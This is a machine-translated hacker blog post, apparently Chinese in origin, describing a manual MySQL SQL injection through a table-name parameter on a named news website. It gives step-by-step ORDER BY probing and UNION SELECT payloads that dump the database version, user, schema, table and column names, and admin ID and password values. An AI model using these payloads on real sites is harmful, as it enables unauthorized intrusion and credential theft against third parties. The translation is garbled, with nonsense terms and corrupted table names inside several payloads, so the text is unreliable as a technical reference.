MySQL table name Injection

The numeric type and the numeric type are common, and the search type and the cookie type are involved. What do you think about the injection of a table name on a stick station, radish couldn't recognize this point (or maybe I didn't have a good configuration), but it was indeed an injection point, so I had to do it manually. Injection Point (no human bypass ): http://www.bkjia.com /News/print_paper.php? Number = 150683 & news_article = news_article the following error is reported when a single quotation mark is added: The table name injection indicates that at least two database operations are performed in this script. The first SQL statement: SELECTDATEFROM news_article WHERE date_order> = 668740920 ORDERBY date_order LIMIT1 the second SQL statement: SELECT * FROM news_article WHERENUMBER = '2016' because the SQL statement contains the where statement, therefore, if you want to inject data from the table name, you must comment out the following content. Here, use ";-". ORDERBY1; -- Return ORDERBY2 on the normal page; -- the first SQL statement returns an error at this time. You know the reason, and the field name queried here is "date". Based on my personal database design experience, this field is usually not of the struct type, which is not conducive to further injection. ORDERBY20; -- normal (except for the first SQL statement, it will not be mentioned later ). ORDERBY50; -- error (second ). ORDERBY40; -- normal ORDERBY45; -- error ORDERBY43; -- error ORDERBY42; -- normal, now you can confirm that the second query statement has 42 fields, and then use union. WHERE1 = California, ,; -- table name injection from the returned results compared with the normal page, the fields, are character type. DATABASE version explosion, USER name, DATABASE Name: WHERE1 = 2UNIONSELECT1, USER (), 5, DATABASE (), version, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42; -- Get version: 5.0.90-log; User name: upnews@61.97.139.36; database Name: upnews, which can be used with information_schema! Burst table (hexadecimal format of upnews): WHERE1 = 2UNIONSELECT1, (SELECT group_concat (TABLE_NAME) FROM (SELECTTABLE_NAMEFROM partition table_schema = 0x75706e657773 LIMIT0, 10) ), 7, 8, 9, 10, 11, 12, 13, 14, 15, (SELECTCOUNT (TABLE_NAME) FROM rows table_schema = rows, 35, 36, 37,38, 39,40, 41,42; -- Because group_conc is used for the first time At () directly explodes, and the number of exposed tables is incorrect, and table name truncation occurs. Therefore, the above burst table statements use subqueries to perform paging queries through limit, only 10 table names are identified at a time. Burst field (bytes is the hex System of news_admin_member): WHERE1 = 2UNIONSELECT1, (SELECT group_concat (column_name) FROM (SELECT column_name FROM partition = partition), 9, 10, 11, 12, 13, 14, 15, (SELECTCOUNT (column_name) FROM information_schema.COLUMNSWHERETABLE_NAME = values), 17,18, 19,20, 22, 25, 26,27, 28,29, 30,31, 32,33, 34,35, 36,37, 38,39, 40,41, 42; -- burst value: WHERE1 = 2UNIONSELECT1, 2,3, 4,5, (SELECT group_concat (concat (id, 0x7c, pass) FROM random, 39, 40,; -- What's next? What do you want to do... O (batch _ injection) o Haha, we can see that the table name injection is very similar to the numeric injection, and even better than other types of injection, because the SQL statements after the table name can be controlled freely.